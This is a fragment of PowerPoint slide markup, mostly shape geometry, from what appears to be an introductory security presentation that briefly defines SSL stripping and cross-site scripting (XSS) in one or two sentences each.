                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4812435" y="3870419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848614" y="3844509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881673" y="3814873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4911309" y="3781814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4937219" y="3745635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959098" y="3706639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4976644" y="3665131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4989553" y="3621414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4997520" y="3575792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5000243" y="3528568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5000243" y="404875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4997520" y="357651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4989553" y="312029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4976644" y="268312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959098" y="226804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4937219" y="187808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4911309" y="151629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881673" y="118570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848614" y="88934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4812435" y="63024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4773439" y="41145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4731931" y="23599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4688214" y="10690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4642592" y="2723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4595368" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F8DE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0553445" y="3253232"/>
            <a:ext cx="122682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210" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40" b="1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2200" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Strip</a:t>
            </a:r>
            <a:endParaRPr sz="2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25457" y="3970680"/>
            <a:ext cx="4081145" cy="11715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 indent="635">
              <a:lnSpc>
                <a:spcPct val="113900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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Strip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exploit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direct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fr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m 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HTTP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HTT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P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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doe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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>’t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e 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plain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HTTP.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43072" y="5463540"/>
            <a:ext cx="9768840" cy="1248410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9768840" h="1248409">
                <a:moveTo>
                  <a:pt x="9560814" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="208025" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160313" y="5491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116521" y="21136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77897" y="45686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45686" y="77897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21136" y="116521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5491" y="160313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="208025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1040130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5491" y="1087842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21136" y="1131634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45686" y="1170258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77897" y="1202469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116521" y="1227019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160313" y="1242664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208025" y="1248156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9560814" y="1248156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9608526" y="1242664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9652318" y="1227019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9690942" y="1202469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9723153" y="1170258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9747703" y="1131634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763348" y="1087842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9768840" y="1040130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9768840" y="208025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763348" y="160313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9747703" y="116521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9723153" y="77897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9690942" y="45686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9652318" y="21136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9608526" y="5491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9560814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490721" y="5955919"/>
            <a:ext cx="931862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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>XSS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inserts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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>script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that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appears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be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part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trusted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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>site.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239000" y="3925823"/>
            <a:ext cx="1750060" cy="1750060"/>
            <a:chOff x="7239000" y="3925823"/>
            <a:chExt cx="1750060" cy="1750060"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7239000" y="3925823"/>
              <a:ext cx="1750060" cy="1750060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1750059" h="1750060">
                  <a:moveTo>
                    <a:pt x="874776" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="826781" y="1294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779462" y="5133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732887" y="11449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687121" y="20177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642231" y="31249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598285" y="44598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555349" y="60158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513490" y="77862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472773" y="97644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433267" y="119436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395038" y="143172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358152" y="168786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322676" y="196209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288677" y="225377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256222" y="256222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225377" y="288677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196209" y="322676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168786" y="358152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143172" y="395038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119436" y="433267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97644" y="472773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77862" y="513490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60158" y="555349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44598" y="598285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31249" y="642231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20177" y="687121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11449" y="732887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5133" y="779462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294" y="826781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="874776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294" y="922770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5133" y="970089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11449" y="1016664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20177" y="1062430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31249" y="1107320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44598" y="1151266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60158" y="1194202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77862" y="1236061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97644" y="1276778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119436" y="1316284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143172" y="1354513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168786" y="1391399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196209" y="1426875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225377" y="1460874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256222" y="1493329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288677" y="1524174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322676" y="1553342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358152" y="1580765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395038" y="1606379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433267" y="1630115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472773" y="1651907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513490" y="1671689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555349" y="1689393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598285" y="1704953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642231" y="1718302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687121" y="1729374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732887" y="1738102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779462" y="1744418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826781" y="1748257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874776" y="1749552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922770" y="1748257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970089" y="1744418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016664" y="1738102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062430" y="1729374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1107320" y="1718302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151266" y="1704953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194202" y="1689393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1236061" y="1671689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276778" y="1651907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316284" y="1630115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354513" y="1606379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391399" y="1580765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426875" y="1553342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460874" y="1524174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493329" y="1493329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524174" y="1460874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1553342" y="1426875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580765" y="1391399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606379" y="1354513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630115" y="1316284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651907" y="1276778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671689" y="1236061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1689393" y="1194202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704953" y="1151266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718302" y="1107320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1729374" y="1062430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738102" y="1016664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744418" y="970089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748257" y="922770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749552" y="874776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748257" y="826781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744418" y="779462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738102" y="732887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1729374" y="687121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718302" y="642231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704953" y="598285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1689393" y="555349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671689" y="513490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651907" y="472773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630115" y="433267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606379" y="395038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580765" y="358152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1553342" y="322676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524174" y="288677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493329" y="256222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460874" y="225377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426875" y="196209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391399" y="168786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354513" y="143172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316284" y="119436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276778" y="97644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1236061" y="77862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194202" y="60158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151266" y="44598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1107320" y="31249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062430" y="20177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016664" y="11449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970089" y="5133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922770" y="1294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874776" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF8B8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64780" y="4338827"/>
              <a:ext cx="818387" cy="97078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932423" y="306451"/>
            <a:ext cx="439356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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(XSS)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704594" y="1882292"/>
            <a:ext cx="13246735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50945" marR="5080" indent="-3738879">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Cross-Site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Scripting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(XSS)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attacks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exploit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fact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browsers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likely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trust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scripts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appear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to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come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from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site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user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chooses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visit.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53584" y="760476"/>
            <a:ext cx="6120384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97023" y="3066428"/>
            <a:ext cx="4224020" cy="4784090"/>
            <a:chOff x="2097023" y="3066428"/>
            <a:chExt cx="4224020" cy="4784090"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2097023" y="3901440"/>
              <a:ext cx="3134995" cy="3133725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3134995" h="3133725">
                  <a:moveTo>
                    <a:pt x="1567434" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1519515" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471954" y="2859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424771" y="6402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377986" y="11327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331621" y="17613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285695" y="25241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240230" y="34188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195245" y="44436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150761" y="55962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106798" y="68748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063378" y="82772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020520" y="98014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978246" y="114454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936575" y="132070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895528" y="150843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855125" y="170752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815388" y="191776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776336" y="213896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737991" y="237090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700372" y="261338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663500" y="286619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627395" y="312914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592079" y="340201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557571" y="368460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523893" y="397671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491064" y="427814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459105" y="458866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428036" y="490809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397879" y="523622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368653" y="557284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340379" y="591774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313078" y="627073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286770" y="663160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261475" y="700014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237215" y="737614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214009" y="775941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191878" y="814974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170842" y="854692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150923" y="895075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132140" y="936102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="977754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98066" y="1020008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82816" y="1062846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68785" y="1106245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55992" y="1150187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44459" y="1194651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34207" y="1239615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25254" y="1285060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17623" y="1330964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11333" y="1377309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6405" y="1424072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860" y="1471234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1518774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1614569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860" y="1662109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6405" y="1709271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11333" y="1756034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17623" y="1802379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25254" y="1848283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34207" y="1893728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44459" y="1938692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55992" y="1983156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68785" y="2027098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82816" y="2070497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98066" y="2113335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="2155589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132140" y="2197241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150923" y="2238268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170842" y="2278651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191878" y="2318369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214009" y="2357402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237215" y="2395729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261475" y="2433329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286770" y="2470183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313078" y="2506270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340379" y="2541569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368653" y="2576059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397879" y="2609721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428036" y="2642534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459105" y="2674477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491064" y="2705529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523893" y="2735672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557571" y="2764883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592079" y="2793142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627395" y="2820429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663500" y="2846724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700372" y="2872005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737991" y="2896253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776336" y="2919447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815388" y="2941567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855125" y="2962591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895528" y="2982500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936575" y="3001273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978246" y="3018889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020520" y="3035329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063378" y="3050571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106798" y="3064595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150761" y="3077381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195245" y="3088907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240230" y="3099155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285695" y="3108102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331621" y="3115730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377986" y="3122016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424771" y="3126941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471954" y="3130484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519515" y="3132625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567434" y="3133344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615352" y="3132625"/>
                  </a:lnTo>
